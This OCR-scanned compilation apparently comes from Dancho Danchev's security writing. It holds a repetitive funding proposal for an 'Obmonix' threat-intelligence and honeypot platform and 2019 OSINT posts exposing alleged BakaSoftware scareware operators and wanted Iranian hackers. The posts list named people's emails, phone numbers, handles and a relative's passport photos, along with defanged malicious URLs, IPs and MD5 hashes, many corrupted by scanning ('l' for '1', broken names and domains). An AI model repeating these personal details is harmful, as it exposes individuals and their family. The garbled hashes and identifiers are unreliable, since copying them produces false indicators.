
• The appliance is capable of ensuring the real-time and 
automated use of the network equipment necessary to 

maintain the active infrastructure to ensure that it's 
operating in an automated and efficient fashion 

Cisco Catalyst is a network equipment allowing the efficient 
productivity type of interconnection between all the 

platforms and network equipment used in this project. 

• Kapow appliance 

Key points: 

• The appliance is capable of processing hundreds of 
thousands of Web sites on a daily basis ensuring the au¬ 
tomated processing and analysis of jihadist communities 
allowing the automation of the monitoring process 

to further enhance the produced actionable intelligence 
leading to a research and analysis produced type of 

research and analysis type of data. 

• The appliance is capable of monitoring and establishing 
the foundations for real-time monitoring and analysis 

of jihadist communities for the purpose of producing 
actionable real-time intelligence research and analysis 


type of research and analysis data. 
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• The appliance is capable of processing multiple jihadist 
forum communities for the purpose of establishing the 

foundations for successful real-time actionable intelligence 
producing research and analysis type of research 

and analysis data. 

The analysis appliance would ensure timely and real-time 
access to current and historical intelligence data in regard 

to jihadist activities online,through the systematic 
automated and real-time data acquisition from a variety of 
public 

and closed sources for the purpose of setting up the 
foundations for a successful data source leading to a 
successful 

analysis and research type of analysis activities. 

• Appliance router 

Key points: 

• The appliance router would ensure the constant and real¬ 
time availability of the network assets for the purpose 

of active and timely acquisition of actionable real-time 
research and analysis type of research and analysis report 


type of research and analysis network assets availability. 

The purpose of the appliance router would be to ensure real¬ 
time connectivity with a variety of platforms to ensure 

that the operator is properly empowered with the necessary 
data techniques and technologies to properly act upon 

analyze and respond to cybercrime and cyber jihad events 
globally. 

• Analytics appliance 
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Key points: 

• the analytics appliance would be capable of performing 
real-time assessment of cybercrime and cyber jihad 

events globally and will ultimately empower the Obmonix 
platform operator with the necessary data informa¬ 
tion and knowledge to act upon prevent and respond to 
cybercrime and cyber jihad events globally 

The purpose of the appliance would be to empower the 
operator with the necessary data information and 
knowledge 

to act upon react to and respond to various cybercrime and 
cyber jihad events globally. 

• Rosette appliance 


Key points: 


• The localization appliance will ultimately empower the 
Obmonix platform operator with the necessary data 

information and knowledge to act upon respond to and 
prevent widespread damage while analyzing cybercrime 

and cyber jihad events globally. 

The purpose of the localization appliance would be to 
empower the Obmonix platform operator with the necessary 

data information and knowledge to act upon respond to and 
prevent widespread damage provoked by cybercrime 

and cyber jihad events globally. 

• Systran appliance 

221 


£ 


Key points: 

• The Systran appliance will ultimately empower the 
operator with the necessary data information and 
knowledge 

to act upon respond to and prevent widespread damage 
while analyzing cybercrime and cyber jihad events 

globally. 

The purpose of the Systran appliance would be to empower 
the Obmonix platform operator with the necessary data 

information and knowledge to act upon respond to and 
prevent widespread damage provoked by cybercrime and 


cyber jihad events globally. 

Funding Phase 

The initial funding phrase will consist of active acquisition of 
assets for the purpose of obtaining access to 

industry leading and proprietary selected providers of threat 
intelligence for the purpose of establishing the 

foundations for an active sensors network type of 
cybercrime/cyber jihad monitor sensor network type of data. 
The 

initial stage will consist of obtaining assets for the purpose 
of obtaining access to industry leading and proprietary 

selected equipment for the purpose of setting the 
foundations for a successful sensor network based type of 
data. 

The initial phase will consist of active purchase of the 
following equipment: FortiSandbox, Blue Coat Malware 

Analysis, NAS Storage, Cisco Firewall, PfSense, Cisco 
Catalyst, Vormetric encryption appliance, including the 
following 

subscription-based type of threat intelligence gathering 
data - Team Cumry, threat, data, feed, Kaspersky, threat, 

data, feed, Abusix, threat, data, feed, MalwarePatrol, threat, 
data, feed, Sophos, threat, data, feed, OPSWAT, Abusix, 

Threat, Feed, Threat, Feed, ProjectFloneypot, threat, data, 
feed. 


- Kaspersky Data Feed 



- Sophos Data Feed 

- Team Cumry Data Feed 

- MalwarePatrol Data Feed 

- Abusix Data Feed 

- LookingGlass Data Feed 

- Cyren Data Feed 

- Symantec Data Feed 

- VirusTotal Data Feed 
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- ProjectHoneypot Data Feed 

The second funding phase will consist of active acquisition 
of honeypot appliance including active netblock 

purchase within a dedicated set of countries for the purpose 
of establishing the foundations of an active sensor 

network type of data-acquisition activities. The second 
funding phase will consist of active acquisition of the 
following 

proprietary appliances: Honeybox Enterprise, honeybox 
SCADA, including netblocks within the following countries, 

The third funding phase will consist of active purchase of 
service and solution-based appliance, including data- 

processing appliance, including localization appliance, for 
the purpose of setting up the foundations for the Obmonix 



platform successfully empowering its operator with the 
necessary data and expertise for the purpose of actively 

responding to global cybercrime and jihad events. 

The third funding phase will consist of active purchase of 
the following appliances: Kapow Software, Rosette 

appliance, Systran appliance, Sentinel appliance, Palantir 
appliance. 

The fourth funding phase will consist of active purchase of 
the World's most popular solution-oriented portal 

for Information Security - Expedited Entry Into the 
Cyber Warfare Realm - a Pro-U.S Based Offensive 
and Asymmet¬ 
ric Cyber Warfare Practical Trends Application Big 
Data and Research-Centered R &D Platform - further 
ensuring 

successfully and ongoing commercilization including the 
active acquisition of client-base, including the establishing 

of the World's largest endpoint based sensor network for 
tracking and responding to cybercrime and jihad events 

globally. 

Dancho Danchev will build a pro-U.S offensive and 
asymmetric cyber warfare program that will inevitably dive 

deep into the Cyber Warfare realm and will produce what 
can be best described as the U.S primary source for 

offensive and asymmetric cyber warfare information 
repository and data-information on current and future trends 



and provide the foundations for a successful R &D cyber 
warfare partnership with millions of loyal Pro-Western 

cyber warriors and researchers globally positioning the 
platform as the leading think-tank for practical and relevant 

cyber warfare power including the World's leading Pro- 
Western Cyber Warfare Research and Development research 

program center. 

With the U.S attempting to tackle the country's perceived 
and outdated Mis-understanding of Cyber Warfare 

in Today's Modern Russia China and Iran dominated Cyber 
Warfare Realm including the ongoing shortage of 

recruitment and relatively outdated and not necessary 
dynamic HR-management pool of hundreds of thousands of 

Pro-U.S Cyber Warriors the platform ultimately empower the 
re-position the U.S as the dominant Cyber Warfare 

power by providing actionable think-tank type of proactive 
and actionable Cyber Warfare insight including the active 

and permanent recruitment of millions of Pro-U.S Cyber 
Warriors further supporting the U.S's mission on its way to 

dominate and launch offensive and defensive cyber 
missions and related research attacks. 

The project will conduct what can be best described as the 
most comprehensive study and analysis to the 
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United States out-dated understanding of the Cyber Warfare 
realm and provide actionable and practical insight including 
a production-ready HR-management and Big Data driven 
Cyber Warfare platform successfully disrupting 

international cybercrime networks conducting economic 
terrorism infiltrating the vibrant cyber-crime and cyber jihad 

international community and successfully recruiting millions 
of Pro-U.S Cyber Warriors. The First Stage of the project 

would ensure that the foundations for a successful invite- 
only Pro-U.S Cyber Warfare community have already been 

established through the direct launching and operation of 
the World's Largest and Proprietary Invite-Only Pro-U.S 

Cyber Warfare Forum Community. 

Associated deliverables will include: the World's largest 
search engine for security information, the World's 

most vibrant community for security job search, the World's 
most vibrant proprietary community for sharing dissem¬ 
inating communicating and enriching security data, the 
World's most comprehensive sensor network for observing 

disseminating and responding to global cybercrime-events, 
the release of community-enriched security router, the 

successful release of community-enriched privacy router, 
the development and release of community-enriched 

public threat feed, the release of community-enriched 
private threat feed, including, proprietary threat feed, 
targeted 



threat intelligence on demand type of research and analysis 
producing solution, proprietary bug bounty solution, 

hacking and security-oriented online radio, hacking and 
security-oriented E-zine, hacking and security-oriented 

videocast, on-demand penetration testing and offensive 
team consulting, on-demand Web site monitoring for 

security events, OEM partnership capabilities, custom-build 
anti-virus scanner capabilities. 

Community Industry Reference 

The contractor Dancho Danchev is an internationally 
recognized cybercrime researcher security blogger and 
threat 

intelligence analyst in the field of cybercrime research 
having successfully contributed to the overall demise of 

cybercrime internationally throughout the past decade 
having successfully pioneered a variety of threat 
intelligence 

gathering methodologies leading him to a successful, 
pursued of high profile nation-state actors and malicious 
actors 

across the globe leading him to a successful pursued of 
high-profile nation-state actors and malicious adversaries 

across the globe the researcher successfully launched a 
newly launched startup named Disruptive Individuals 
aiming 



to disrupt the undermine the international cybercrime and 
cyber-jihad ecosystem globally. 

Statement of Work (SOW) 

01. Vendor contact - the initial stage of the project will 
consist of direct contact between industry leading 
commercial 

security appliance providers further requesting pricing and 
shipping details including a "point-of-contact". 

• Possible deliverables consisting of the initial stage include 
industry-leading security appliance - FortiMail, Blue 

Coat Malware Analysis. FortiSandbox, Vormetric encryption 
appliance, Barracuda Web Application appliance, 

Checkpoint DDoS Protector, Ethernet encryptor, Cisco 
Catalyst, Kapow appliance, Palantir appliance, Cisco fire¬ 
wall appliance, Rosette appliance, Systran appliance, NAS 
appliance, pfSense appliance, Floneybox appliance, 

Floneybox SCADA appliance. 

02. Vendor netblock contact - The initial stage of the project 
will consist of direct contact between industry leading 
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providers of netblock requesting pricing information for 
specific pre-defined geolocated regions of interest. 

• Possible deliverables including netblock in Algeria, 
Argentina, Bahrain, Bolivia, Brazil, Burkina faso, Chile, 
China, 



Colombia, Cyprus, Ecuador, Guatemala, Jordan, Democratic 
People's Republic of Korea, Liberia, Macao, Mal¬ 
dives, Moldova, Republic of Nauru, Niger, Pakistan, Poland, 
Romania, Sierra Leone, Sudan, Arab Republic Syrian, 

Togo, Uganda, Vanuatu, Yemen. 

03. Vendor threat data contact - the initial stage of the 
project will consist of direct contact between industry- 
leading 

including a selected set of threat data providers requesting 
pricing information including possible partnership 

opportunity. 

• Possible deliverables including Team Cumry threat data 
feed Kaspersky threat data feed, Abusix threat data 

feed, MalwarePatrol threat data feed, Sophos threat data 
feed, OPSWAT, Abusix Threat Feed, ProjectHoneypot 

threat data feed. 

04. Secure location foundation - the initial stage of the 
project will consist of direct evaluation of the infrastructure 

required for the secure location including direct contact 
between security vendors to ensure a secure location. 

• Possible, deliverables, include, military-grade, fence, 
surveillance, security, guard. 

05. Vendor connection contact - the initial stage of the 
project will consist of direct contact between vendor to 



ensure that the infrastructure is properly secured ensuring a 
timely and secure infrastructure. 

• Possible deliverables include direct connection. 

06. Secure work environment - the initial stage of the 
project will consist of direct evaluation including a direct 

purchase of a work terminal to ensure a smooth and secure 
work environment 

• Possible deliverables including RF shielding, SEL SP-157, 
FSPK-10, SEL SP-113 "Blockade". 

07. Secure work environment - the initial stage of the 
project will consist of direct evaluation including a direct 

purchase of equipment related to secure work environment 
to ensure a smooth and secure work environment. 

• Possible deliverables including Cisco Firepower ASA, 
Checkpoint Threat appliance, Nova network appliance, 

Fortinet security appliance, Dell Soho network, security 
appliance. 

The contractor Dancho, Danchev is one of the world's 
leading experts in the field of cybercrime research and 
threat 

intelligence gathering having successfully tracked 
monitored and profiled high-profile nation-state and 
malicious 

actors type of fraudulent activity over the past decade 
having successfully pioneered and established a direct 



connection with some of the world's leading providers of 
threat intelligence gathering. 

The contractor's initial goal for the purpose of the Obmonix 
platform would be to achieve the world's largest 
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and most comprehensive sensor type of network for 
monitoring profiling and keeping track of nation-state 
malicious-actors type of fraudulent and malicious activity. 

The project main base would be located in a discreet 
location in Sofia Bulgaria. The contractor would eventu¬ 
ally ensure that active RF shielding including basic physical 
security measures are taken in place including active 

surveillance military-grade fence and an associated security 
guard are in place for the purpose of establishing the 

foundation of a secure work environment. 

The Obmonix platform aims to build the World's most 
versatile and comprehensive sensor network for inter¬ 
cepting monitoring and responding to cybercrime and cyber 
jihad events successfully deploying a variety of 

proprietary sensor network based of honeypot appliances 
industry-wide partnership including the utilization of 

proprietary cybercrime and cyber jihad forum and 
community monitoring and infiltration campaigns 
successfully 

positioning the platform as the leading indicator for 
cybercrime and cyber jihad activity globally. 



Cost Proposal - Detailed Project Information 

01. Equipment cost - The Obmonix platform will ultimately 
rely on the following equipment cost for the purpose of 

establishing the foundations for the Obmonix platform. 

• FortiMail 

• FortiSandbox 

• Blue Coat Malware Analysis 

• Vormetric encryption appliance 

• Checkpoint DDoS Protector 

• Encryption appliance 

• Cisco Catalyst 

• Kapow appliance 

• Appliance router 

• Analytics appliance 

• Infoblox Trinzic 1420 

• Nova network security 

• Cisco firewall appliance 

• lllusionBlack Framework 

• Rosette appliance 

• Systran appliance 
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• NAS appliance 

• pfSense 

• Honeybox appliance 

• Honeybox SCADA appliance 

• Network equipment 

Detailed Project Funding Phase Information 

01. The initial funding phrase will consist of active 
acquisition of assets for the purpose of obtaining access to 
industry 

leading and proprietary selected providers of threat 
intelligence for the purpose of establishing the foundations 
for 

an active sensors network type of cybercrime/cyber jihad 
monitor sensor network type of data. The initial stage 

will consist of obtaining assets for the purpose of obtaining 
access to industry leading and proprietary selected 

equipment for the purpose of setting the foundations for a 
successful sensor network based type of data. 

• The initial phase will consist of active purchase of the 
following equiptment: FortiSandbox, Blue Coat Malware 

Analysis, NAS Storage, Cisco Firewall, PfSense, Cisco 
Catalyst, Vormetric encryption appliance, including the 



following subscription-based type of threat intelligence 
gathering data - Team Cumry threat data feed, Kaspersky 

threat data feed, Abusix,threat data feed, MalwarePatrol 
threat data feed, Sophos threat data feed, OPSWAT, 

Abusix Threat Feed, ProjectHoneypot threat data feed. 

Including the following Threats Feeds: 

• Kaspersky Data Feed 

• Sophos Data Feed 

• Jigsaw Threat Data Feed 

• IBM X-Force Exchange 

• Team Cumry Data Feed 

• Proof point Threat Feed 

• NetSTAR Data Feed 

• RisklQ Data Feed 

• ESET Data Feed 

• Pixalate Data Feed 

• MalwarePatrol Data Feed 

• Abusix Data Feed 

• Massive Data Feed 

• PhishLabs Data Feed 

• LookingGlass Data Feed 
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• Blueliv Data Feed 

• Mnemonic Data Feed 

• Cyren Data Feed 

• ADMINUSLabs Data Feed 

• NSFOCUS Data Feed 

• Webroot Data Feed 

• Symantec Data Feed 

• VirusTotal Data Feed 

• ProjectHoneypot Data Feed 

02. The second funding phase will consist of active 
acquisition of honeypot appliance including active netblock 

purchase within a dedicated set of countries for the purpose 
of establishing the foundations of an active sensor 

network type of data-acquisition activities. 

• The second funding phase will consist of active acquisition 
of the following proprietary appliances: Floneybox 

Enterprise, Infoblox Trinzic 1420, honeybox SCADA, 
including netblocks within a dedicated set of countries - 

Algeria, Argentina, Bahrain, Bolivia, Brazil, Burkina faso, 
Chile, China, Colombia, Cyprus, Ecuador, Guatemala, 




Jordan, Democratic People's Republic of Korea, Liberia, 
Macao, Maldives, Moldova, Republic of Nauru, Niger, 

Pakistan, Poland, Romania, Sierra Leone, Sudan, Arab 
Republic Syrian, Togo, Uganda, Vanuatu, Yemen. 

03. The third funding phase will consist of active purchase 
of service and solution-based appliance, including 

data-processing appliance, including localization appliance, 
for the purpose of setting up the foundations for the 

Obmonix platform successfully empowering its operator 
with the necessary data and expertise for the purpose of 

actively responding to global cybercrime and jihad events. 

• The third funding phase will consist of active purchase of 
the following appliances: Kapow Software, Rosette 

appliance, Systran appliance, Sentinel appliance, Palantir 
appliance. 

In case you're interested in working with me for the purpose 
of implementing this project including possible investor 

introduction -1 can be reached at 
dancho.danchev@hush.com 

1. http://www.dia.mil/Business/Needioedia/ 

2. https://www.srf.or a/ 

228 


2 . 


2019 





229 


2.1 


January 

230 


£ 


Who's Behind BakaSoftware? - OSINT Analysis (2019- 
01-15 18:32) 

Remember [l]BakaSoftware? The ubiquitous scareware¬ 
serving and distributing money laundering scareware 

affiliate-based network circa 2008? It appears that the time 
has come to expose the actual individuals behind the 

campaign and the actual network. 

In this analysis I'll discuss in depth the BakaSoftware 
franchise circa 2008 including in-depth and personally 

identifiable information on the cybercriminals behind it with 
the idea to empower law enforcement and the security 

industry with the necessary data and information that would 
eventually lead to the prosecution and tracking down 

of the cybercriminals behind BakaSoftware. 

I can be reached at dancho.danchev@hush.com 

Personal Photo of Gavril Danilkin - Founder and CEO 
of BakaSoftware: 


Second Personal Photo of Gavril Danilkin - Founder 
and CEO of BakaSoftware: 
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Personally Identifiable Information regarding 
Baka Software's Founder and CEO - Gavril Danilkin: 

Name: Gavril Danilkin 

Email: gavril@penza.net; fido@penza.net; 
doncapone@mail.ru; gav ril@sura.com.ru; 

Mobile Phone: 8412631806; 89023537746; 841251-06- 
02; 841256-49-45; 841276-06-93 

Skype: BakaDialer 

Web Site: http://penza-stroika.narod.ru 

BakaSoftware Social Network Visualization Graph 
courtesy of Maltego: 
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Personal Passport Photo of Gavril Danilkin's father 
Danilkin Vasily Vasilyevich: 
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Second Personal Passport Photo of Gavril Danilkin's 
father Danilkin Vasily Vasilyevich: 
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Malicious and Fraudulent Infrastructure 
reconnaissance: 

hxxp://bakasoftware.com - 216.240.138.200 - Email: 
gavril@penza.net 

hxxp://nsl.bakasoftware.com - 216.255.189.139 Email: 
support@tobesoftware.com 

hxxp://tst.bakasoftware.com - 216.255.189.155 - Email: 
support@tobesoftware.com 

hxxp://bakasoftware.net - 208.88.227.36; 208.88.227.36 - 
Email: krab@thekrab.com 

hxxp://bakad ialer.com 

Personally Identifiable Information regarding 
BakaSoftware - TheKrab: 

Name: TheKrab 

Email: marck@gmail.com 

Phone: +7 012-225-5252 

Web site: http://smmprofi.ru/marck 

Personal Photo of a known BakaSoftware Gang 
Member known as - TheKrab: 
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Related Personal Photo of a known BakaSoftware 
Gang Member known as - TheKrab: 
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It gets even more interesting to find out that BakaSoftware' 
Gavril Danilkin is currently running a rogue and potentially 


malicious rogueware and adware distributing affiliate- 
company known as Zaxar Limited. Let's take the time and 
effort 

and provide actionable intelligence on the infrastructure 
behind the campaign. 

Related Zaxar Ltd Information: 

Zaxar Limited 
P.O. Box 54922, 

Zip 3729, 

Limassol, Cyprus 

e-mail: secretary@zaxar.net 

Related malicious URLs known to have participated 
in the campaign: 

hxxp://zxrmed ia.com/client/current _version6/cef 
extensions, pak 

hxxp://zxrmed ia.com/client/current _version6/gameslist.dat 

hxxp://zxrmed ia.com/client/current _version6/cal ling, wav 

hxxp://zxrmedia.com/client/current _version6/cef _100 
_percent.pak 

hxxp://zxrmed ia.com/client/current _version6/devtools 
_resources.pak 

hxxp://zxrmed ia.com/client/current _version6/cef. pak. info 



Fraudulent and malicious rogue network 
infrastructure reconnaissance: 

hxxp://zaxargames.com - 185.82.210.27; 185.82.210.24; 
185.82.210.30 

hxxp://zxrmedia.com - 185.82.210.5; 185.82.210.26; 
188.42.129.36; 185.82.210.29 

hxxp://zaxarstore.com - 185.82.210.24 

hxxp://zaxargames.com 

hxxp://zaxarsearch.com 

Related malicious MD5s p art of known to have 
participated in the campaign: 

MD5: 5c60400d7663b9a3fedd93baf0156df9 

MD5: 5ddl8fl22fbe022e6e366d79d5b2b8a0 

MD5: 225802al2e3aaeb9773b681ebe96bbe7 

MD5: a50ef877e6329d2851de3fd4f49b8f7a 

MD5: C82fl77911708cd8373f7d788ce5ef3a 

MD5: 73b48b697e7e09e2325656734eaf9f48 

MD5: 522cb664e0284abf055315d327ff9c6d 

MD5: 225blab5889506d39643d736dl5fe20d 

MD5:3ca8378d493d9aal248359c44cb0eeb8 

MD5: 7c897ce217b05bbl694a924afa34096c 
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MD5: 73b48b697e7e09e2325656734eaf9f48 

MD5: 310e8b0e4f6dbd23c74b9fec300a24f6 

Related malicious MD5s known to have participated 
in the campaign: 

MD5: 225blab5889506d39643d736dl5fe20d 

MD5:3ca8378d493d9aal248359c44cb0eeb8 

MD5: 7b2994888fdf0c08a357cc9c600c2c4d 

MD5: 5b3fcbe6f8071e9035b8810dd3b0fl43 

MD5: 58d9aa76eaed4710e22f835c6c71159e 

MD5: 3d327881d2950c3c7d0a58ecaal5720d 

MD5: 37a90a8afldd4c6b68cd54ddb8c6d37d 

MD5: 409a8c35651363ab2ba8dld39e257d82 

MD5: 605425dldbade7c978ebdc313b6312d5 

Related malicious MD5s known to have participated 
in the campaign: 

MD5: 201cfcfbled6dcaf229073318c4aaf06 
MD5: 8a9b2c23cc50f9798159297d300b0c46 
MD5: 0149del71a6530737blae82e9cf9b0cf 
MD5: Icc70f8fdl34bf7f556fca762a0a8ee7 


MD5: 36e083ae0d58cb2f342f4cb81d6af88c 



MD5: Icc70f8fdl34bf7f556fca762a0a8ee7 

MD5: 0149del71a6530737blae82e9cf9b0cf 

MD5: 3092c54065a78ec88122e066bccf6238 

MD5: Icc70f8fdl34bf7f556fca762a0a8ee7 

MD5: 0149del71a6530737blae82e9cf9b0cf 

MD5: 049684e041281f3f7c90fb75cdc70e09 

MD5: Icc70f8fdl34bf7f556fca762a0a8ee7 

MD5: 6d5edf93cle4a2dle2e5777884ed326f 

MD5: 8998c75fbd86bb63d4151a810balb4de 

MD5: Icc70f8fdl34bf7f556fca762a0a8ee7 

Related malicious MD5s known to have participated 
in the campaign: 

MD5:3ca8378d493d9aal248359c44cb0eeb8 
MD5: 58d9aa76eaed4710e22f835c6c71159e 
MD5: 7b2994888fdf0c08a357cc9c600c2c4d 
MD5: 5b3fcbe6f8071e9035b8810dd3b0fl43 
MD5: 3d327881d2950c3c7d0a58ecaal5720d 
MD5: 37a90a8afldd4c6b68cd54ddb8c6d37d 
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MD5 :409a8c35651363ab2ba8dld39e257d82 



MD5 :605425dldbade7c978ebdc313b6312d5 

Related malicious MD5s known to have participated 
in the campaign: 

MD5: dafelcll89a6fc55800d0874ffd6567c 
MD5: C66d0521a736b73bbdl09dedba2da396 
MD5: 6cce70d4d7280c7f3ec913217d2b3293 
MD5: cab53b3a6cc7cd8c0b04e0521770b35c 
MD5: f085905595f59ac025b67c3756babe99 
MD5: 201cfcfbled6dcaf229073318c4aaf06 
MD5: 41c2f3797480al016741cbaa232da336 
MD5: 6f31fd7b8de723a6e6bab77d22276e47 
MD5: 0cc657e83c5a74b7edcfe0827a976d08 
MD5: 3323e84cf633173db496c2f6402ffd81 
MD5: 265c61469587e932f384e862a0c7065d 
MD5:e9008ecb5da99d71c0541652aa6d5bc6 
MD5: 26570d6bebf71373c25dbfle53208444 
MD5: el086a5b5c504b95dda3fbd90758a429 
MD5: 8998c75fbd86bb63d4151a810balb4de 
MD5: 0743c40c4791f4cba8488a4a908f3a57 


MD5: 36e083ae0d58cb2f342f4cb81d6af88c 



MD5: 0357c02fc9fdeff9ad3f78876438256b 


MD5: 3092c54065a78ec88122e066bccf6238 

MD5: Iaed2fc8ca434c06a6ac90264634769c 

MD5: ebdf43127a54cl34bb3b01ce74bb5a42 

MD5: 049684e041281f3f7c90fb75cdc70e09 

MD5: 8a9b2c23cc50f9798159297d300b0c46 

MD5: fal5abd8810b2e9349b7723b7cbldl32 

MD5: 0149del71a6530737blae82e9cf9b0cf 

MD5: 6d5edf93cle4a2dle2e5777884ed326f 

MD5: Icc70f8fdl34bf7f556fca762a0a8ee7 

MD5: 195377bef6d2b3cb5d56b387fca8ba60 

Related malicious MD5s known to have participated 
in the campaign: 

MD5: fec37b3989e590d0f3d78c6069bb0ca0 
MD5: 1554933el243dedb041fec9029ee087c 
MD5: a860ed06f5d6f6ab390edfa39c59bl64 
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MD5: 61032381f8fbl4cac5f9da88651b45be 

MD5: 4d53a34254cbc5723a5fb960fcd4al66 

Related malicious MD5s known to have participated 
in the campaign: 



MD5: 0357c02fc9fdeff9ad3f78876438256b 

MD5: 201cfcfbled6dcaf229073318c4aaf06 

MD5: 4900el94aaf35456f9b4a97elca38d99 

MD5: 8a9b2c23cc50f9798159297d300b0c46 

MD5:2e4dc797e098104854dc555d93dd084a 

MD5: 0149del71a6530737blae82e9cf9b0cf 

MD5: Icc70f8fdl34bf7f556fca762a0a8ee7 

MD5: f69ce553ed33506d82el2fabc6f7c67a 

MD5: 6cla294a9f6cb3279b68551501ca654a 

MD5: fd6e30b879ea2347ell24376b5f2dlcf 

Related malicious MD5s known to have participated 
in the campaign: 

MD5: dafelcll89a6fc55800d0874ffd6567c 
MD5: C66d0521a736b73bbdl09dedba2da396 
MD5: 6cce70d4d7280c7f3ec913217d2b3293 
MD5: cab53b3a6cc7cd8c0b04e0521770b35c 
MD5: f085905595f59ac025b67c3756babe99 
MD5: 201cfcfbled6dcaf229073318c4aaf06 
MD5: 41c2f3797480al016741cbaa232da336 


MD5: 6f31fd7b8de723a6e6bab77d22276e47 



MD5: 0cc657e83c5a74b7edcfe0827a976d08 


MD5: 3323e84cf633173db496c2f6402ffd81 
MD5: 265c61469587e932f384e862a0c7065d 
MD5:e9008ecb5da99d71c0541652aa6d5bc6 
MD5: 26570d6bebf71373c25dbfle53208444 
MD5: el086a5b5c504b95dda3fbd90758a429 
MD5: 8998c75fbd86bb63d4151a810balb4de 
MD5: 0743c40c4791f4cba8488a4a908f3a57 
MD5: 36e083ae0d58cb2f342f4cb81d6af88c 
MD5: 0357c02fc9fdeff9ad3f78876438256b 
MD5: 3092c54065a78ec88122e066bccf6238 
MD5: Iaed2fc8ca434c06a6ac90264634769c 
MD5: ebdf43127a54cl34bb3b01ce74bb5a42 
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MD5: 049684e041281f3f7c90fb75cdc70e09 
MD5: 8a9b2c23cc50f9798159297d300b0c46 
MD5: Pfal5abd8810b2e9349b7723b7cbldl32 
MD5: 0149del71a6530737blae82e9cf9b0cf 
MD5: 6d5edf93cle4a2dle2e5777884ed326f 
MD5: Icc70f8fdl34bf7f556fca762a0a8ee7 



MD5: 195377bef6d2b3cb5d56b387fca8ba60 


Related malicious MD5s known to have participated 
in the campaign: 

MD5: 201cfcfbled6dcaf229073318c4aaf06 

MD5: 8a9b2c23cc50f9798159297d300b0c46 

MD5: 0149del71a6530737blae82e9cf9b0cf 

MD5: Icc70f8fdl34bf7f556fca762a0a8ee7 

MD5: 36e083ae0d58cb2f342f4cb81d6af88c 

MD5: Icc70f8fdl34bf7f556fca762a0a8ee7 

MD5: 0149del71a6530737blae82e9cf9b0cf 

MD5: 3092c54065a78ec88122e066bccf6238 

MD5: Icc70f8fdl34bf7f556fca762a0a8ee7 

MD5: 0149del71a6530737blae82e9cf9b0cf 

MD5: 0149del71a6530737blae82e9cf9b0cf 

MD5: 049684e041281f3f7c90fb75cdc70e09 

MD5: Icc70f8fdl34bf7f556fca762a0a8ee7 

MD5: 6d5edf93cle4a2dle2e5777884ed326f 

MD5: 8998c75fbd86bb63d4151a810balb4de 

MD5: Icc70f8fdl34bf7f556fca762a0a8ee7 

Related malicious MD5s known to have participated 
in the campaign: 



MD5: 23e3c313658bae8632bfc3196872daf3 


MD5: 225802al2e3aaeb9773b681ebe96bbe7 
MD5: 23e3c313658bae8632bfc3196872daf3 
MD5: 225802al2e3aaeb9773b681ebe96bbe7 
MD5: b37acllblcba7739eedac8082be6cc51 
MD5: cbefcfl4b0c24201c2b8eedaaff58738 
MD5: 89724ccedl2e644a296cf9dbll90edlf 
MD5: 12cc90ab2a0a2f0c8d208823aff36ad4 
MD5: b2f616daf5512b640a70d3e3cc4c019b 
MD5: 7dc92f595dbf2a5073a94c2ba3a90ed6 
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MD5: 25700c5457c42eblae5185b6f577f8e0 
MD5: a236c6ab86df7738ab9a9fda53702a50 
MD5: 55e705f62af72f54b8819dd504e0b793 
MD5: cbefcfl4b0c24201c2b8eedaaff58738 
MD5: 797fld671eb48c008aa2842cdbe28a91 
MD5: cbefcfl4b0c24201c2b8eedaaff58738 
MD5: 93cla7aa2885ac2bl23fcl6906ea01e0 
MD5: b241d2a0f66a40eb07fbe0bca529e386 


MD5: 244677c44af4648ceald3142611dc4c3 



MD5: 34dcl08714b3fb92f41f3efac3e60ba5 


MD5: 225802al2e3aaeb9773b681ebe96bbe7 

MD5: fl40fed5014b826c99fdd7429f8afb89 

MD5: 3d02cbb7edlc72c2df209a3342b9efed 

MD5: 86f527fb98672055217428a77e337252 

MD5: df393d5e0cc4cdbbdll0d2a09cb42983 

MD5: 894d046c09f338e657ec7828c4c69fc7 

MD5: fc60d4b0fce4c4e3779762bce0f5b69d 

MD5: f959e44ac691448a31c0e051fd39d2fa 

MD5: 9cbe8022efc081c5ba3clf291989277f 

Related malicious MD5s known to have participated 
in the campaign: 

MD5: e6025966d8f72a80884eb7bel9d31fcb 

MD5:734a9c8b47712d396bcdl562a229517e 

MD5: e6025966d8f72a80884eb7bel9d31fcb 

MD5: 9cbe8022efc081c5ba3clf291989277f 

Related domains known to have participated in the 
campaign: 

hxxp://syscosl5.ru 

hxxp ://y9807akgtzcrolb. nidetafzy.ru 

hxxp://syscosl9.ru 



hxxp://send mel3.ru 
h xx p://d ysy. sto ri a I. ru 
hxxp://send mel2.ru 
hxxp://sendme9.ru 
hxxp://sendme8.ru 
hxxp://syscos30.ru 
hxxp://syscosl8.ru 
Stay tuned! 

1. https://www.secureworks.com/research/ro a ue-antivirus- 
part-2 
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Exposing Iran's Most Wanted Cybercriminals - FBI 
Most Wanted Checklist - OSINT Analysis (2019-01-16 
11:09) Remember my most recently published " 
[l]Assessing The Computer Network Operation 
(CNO) Capabilities of 

the Islamic Republic of Iran - Report"? The report 
details and discusses in-depth the most prolific Iran-based 

government-sponsored and tolerated hacking groups 
including the following groups: 

- Ashiyane Digital Security Team 

- Iranhack Security Team 

- Iranian Datacoders Security Team 





- Iran Security Team a.k.a SEPANTA Team/Iran Cyber Army 
2012/2013 

- IDH Security Team 

- Bastan Security Team 

- NOPO Digital Security Team 

- Shekaf Security Team 

- Mafia Hacking Team 

- Iran Black Hats Team 

- Delta Hacking Security Team 

- Digital Boys Underground Team 

- Irlst Security Team 

I recently came across to [2]FBTs Most Wanted 
Cybercriminals List and decided to elaborate more by 
provid¬ 
ing actionable Threat Intelligence on some of the most 
Wanted Iranian cybercriminals with the idea to help law 

enforcement and to inform the security industry and to 
ensure that the cybercriminals behind these campaigns can 

be properly tracked down and prosecuted. 

I can be reached at dancho.danchev@hush.com 

In this OSINT analysis I'll provide actionable intelligence 
including personally identifiable information some of 



FBI's Most Wanted Iranian cybercriminals including 

[3]Ahmad Fathi, [4]Hamid Firoozi, [5]Amin Shokohi, 
[6]Mohammad Sadegh Ahmadzadegan, [7]Omid 
Ghaffarinia, [8]Sina Keissar, [9]Nader Saedi including 
the infamous ITSec Team and the Mersad Co. company. 
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Personally Identifiable Information regarding Sun Army 
Team Members including ITSec Team and the Mersad Co. 

company: 

Sun Army Team Members: 

Nitrojen26, Mehdy007, MagicCoder, tHe.Mo3tafA, Plus, 
BodyGuard 

Sample Network Infrastructure Reconnissance: 


hxxp://sun-army.org - 185.53.179.10 - Email: 

Sun.Army@asia.com; Lord.private@ymail.com 

Name: Omid Ghaffarinia 

Handle: Plus 

